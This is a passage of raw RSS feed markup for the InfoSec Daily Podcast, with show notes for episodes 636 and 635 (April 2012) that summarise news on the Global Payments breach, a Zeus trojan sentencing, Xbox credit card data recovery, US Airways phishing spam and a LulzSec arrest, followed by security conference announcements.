<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://averysawaba.blogspot.com/2012/04/global-payments-breach.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://averysawaba.blogspot.com/2012/04/global-payments-breach.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It isn&rsquo;t so much the size of this breach that is significant, but the fact that one of the largest global payment processors got popped. Visa has allowed them to continue processing credit cards, but dropped them off their service provider registry (which is a BIG deal). The breach only affects North American merchants and cardholders. To give you an idea of how bad a breach at a large credit card processor can be, if a month&rsquo;s worth of the transactions they handle were exposed, it is entirely possible that over 90% of all cardholders in the US would need new credit/debit cards.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This doesn&rsquo;t happen often. I only know of two other cases where a processor was hit by a breach. CardSystems Services, as a business, was literally destroyed by their breach. VISA and AMEX revoked processing rights, forcing CardSystems to have to shut down operations and sell off assets almost overnight. Heartland Payment Systems is the most recent case, and the second largest breach ever at 130 million. They were also stripped from the registry, but managed to recover, regain PCI compliance, and get back onto the registry within a year.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Global Payments has set up a whole separate site to communicate with customers regarding the breach: </span><a href="http://www.2012infosecurityupdate.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.2012infosecurityupdate.com/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oddly, it appears to be 100% static HTML <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':-D' class='wp-smiley' /> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://garwarner.blogspot.com/2012/04/uk-zeus-user-g-zero-sentenced.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://garwarner.blogspot.com/2012/04/uk-zeus-user-g-zero-sentenced.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to today&#39;s Daily Mail, court details have now emerged regarding Edward Pearson, </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">a 23 year old hacker from York, England known online as &quot;G-Zero&quot;, and his activities involving the Zeus and SpyEye trojans.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pearson was ultimately arrested after his girlfriend, Cassandra Mennim, tried to pay for hotel rooms at the Cedar Court Grand Hotel and the Lady Anne Middleton Hotel, both in York, using stolen credit cards. (Pictures of the hotels were in the Daily Mail&#39;s original story on this case on February 20 &#8211; Computer whizz faces jail for writing programme to steal personal details of 8 MILLION people, including 400 PayPal accounts.&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://threatpost.com/en_us/blogs/microsoft-investigate-alleged-xbox-credit-card-hack-040312"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/microsoft-investigate-alleged-xbox-credit-card-hack-040312</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft is looking into a potential security issue affecting its Xbox 360 video game console this week after a group of college students claimed they were able to extract the credit card information of a console&rsquo;s previous owner from the machine.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ashley Podhradsky, Rob D&rsquo;Ovidio, and Cindy Casey of Drexel University and Pat Engebretson of Dakota State University reportedly bought a refurbished Xbox from a Microsoft-authorized reseller in 2011 and were able to access old files containing the credit card information of the device&#39;s first owner. Despite having its hard drive wiped and its factory settings previously reset, the console was cracked after the students installed a software &quot;modding&quot; tool that allows Xbox owners to install applications that aren&#39;t sanctioned by Microsoft.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft called the hack unlikely in a</span><a href="http://www.zdnet.com/blog/security/microsoft-investigating-used-xbox-360-credit-card-hack/11260?tag=content;siu-container"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> statement obtained by ZDNet</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Monday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jim Alkove, General Manager, Security of Microsoft&rsquo;s Interactive Entertainment Business division, claimed the company launched an investigation into the hack. Alkove asserted that Xbox 360 consoles are not designed to store credit card data, adding that it was unlikely any information was recovered in the fashion the hackers described.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;When Microsoft refurbishes used consoles we have processes in place to wipe the local hard drives of any other user data,&rdquo; Alkove said, &ldquo;we can assure Xbox owners we take the privacy and security of their personal data very seriously.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gawker&rsquo;s video game blog</span><a href="http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Kotaku</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> interviewed Podhradsky about the device&rsquo;s security late last week.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Microsoft does a great job of protecting their proprietary information,&quot; she told the site, &quot;but they don&#39;t do a great job of protecting the user&#39;s data.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://threatpost.com/en_us/blogs/us-airways-spam-redirects-blackhole-zeus-infection-040312"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/us-airways-spam-redirects-blackhole-zeus-infection-040312</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercriminals are targeting US Airways customers with malicious spam emails containing a link that, once clicked, initiates a series of redirects, eventually leading users to a domain hosting the Blackhole exploit kit.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fraudulent email presents itself as a check-in notification from US Airways. After a brief description of check-in procedures, there is a hyperlink that claims to lead to &lsquo;online reservation details,&rsquo; but actually ends up taking victims to a page that infects them with the Zeus trojan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Securelist&rsquo;s Dmitry Tarakanov, the cybercriminals responsible are hopeful that someone receiving this email is flying somewhere sometime soon. However, most of the users targeted were not flying anywhere on the day in question, and, therefore, did not click the link.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2012/04/03/lulzsec_suspect_back_in_jail/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/04/03/lulzsec_suspect_back_in_jail/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Teenage LulzSec suspect Ryan Cleary is back behind bars after breaching his bail conditions by going online, it has emerged.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cleary, 19, from Wickford in Essex, who was charged with participating in denial of service attacks against the Serious Organised Crime Agency and the British Phonographic Industry last June, violated an order to stay off the internet, his solicitor said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to cops, the breach occurred when Cleary allegedly contacted Hector Xavier &quot;Sabu&quot; Monsegur &ndash; whom the FBI has fingered as the leader of the LulzSec hacktivist collective &ndash; several times over the Christmas period. Monsegur had allegedly been acting as an FBI informant since at least last August.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-636-sawabas-global-payment-writeup-g-zero-mystery-java-hacking-the-friendly-skys-and-cleary-in-the-clink/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3726/0/infosec-daily-podcast-episode-636.mp3" length="15352940" type="audio/mpeg" />
		<itunes:duration>0:31:59</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 636 for April 3, 2012. Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, and Themson Mester.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 636 for April 3, 2012. Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, and Themson Mester.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 

Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training

Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://averysawaba.blogspot.com/2012/04/global-payments-breach.html
&#160;
It isn&#8217;t so much the size of this breach that is significant, but the fact that one of the largest global payment processors got popped. Visa has allowed them to continue processing credit cards, but dropped them off their service provider registry (which is a BIG deal). The breach only affects North American merchants and cardholders. To give you an idea of how bad a breach at a large credit card processor can be, if a month&#8217;s worth of the transactions they handle were exposed, it is entirely possible that over 90% of all cardholders in the US would need new credit/debit cards.
&#160;
This doesn&#8217;t happen often. I only know of two other cases where a processor was hit by a breach. CardSystems Services, as a business, was literally destroyed by their breach. VISA and AMEX revoked processing rights, forcing CardSystems to have to shut down operations and sell off assets almost overnight. Heartland Payment Systems is the most recent case, and the second largest breach ever at 130 million. They were also stripped from the registry, but managed to recover, regain PCI compliance, and get back onto the registry within a year.
&#8230;
&#160;
Global Payments has set up a whole separate site to communicate with customers regarding the breach: http://www.2012infosecurityupdate.com/
Oddly, it appears to be 100% static HTML  
&#160;
Source: http://garwarner.blogspot.com/2012/04/uk-zeus-user-g-zero-sentenced.html
&#160;
According to today&#39;s Daily Mail, court details have now emerged regarding Edward Pearson, 
a 23 year old hacker from York, England known online as &#34;G-Zero&#34;, and his activities involving the Zeus and SpyEye trojans.
&#160;
Pearson was ultimately arrested after his girlfriend, Cassandra Mennim, tried to pay for hotel rooms at the Cedar Court Grand Hotel and the Lady Anne Middleton Hotel, both in York, using stolen credit cards. (Pictures of the hotels were in the D[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 635 &#8211; Flashback variant, Pastebin Monitors, Lost Revenue and TweetDeck</title>
		<link>http://www.isdpodcast.com/episode-635-flashback-variant-pastebin-monitors-lost-revenue-and-tweetdeck</link>
		<comments>http://www.isdpodcast.com/episode-635-flashback-variant-pastebin-monitors-lost-revenue-and-tweetdeck#comments</comments>
		<pubDate>Tue, 03 Apr 2012 00:47:48 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3721</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 635 for April 2, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 635 for April 2, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
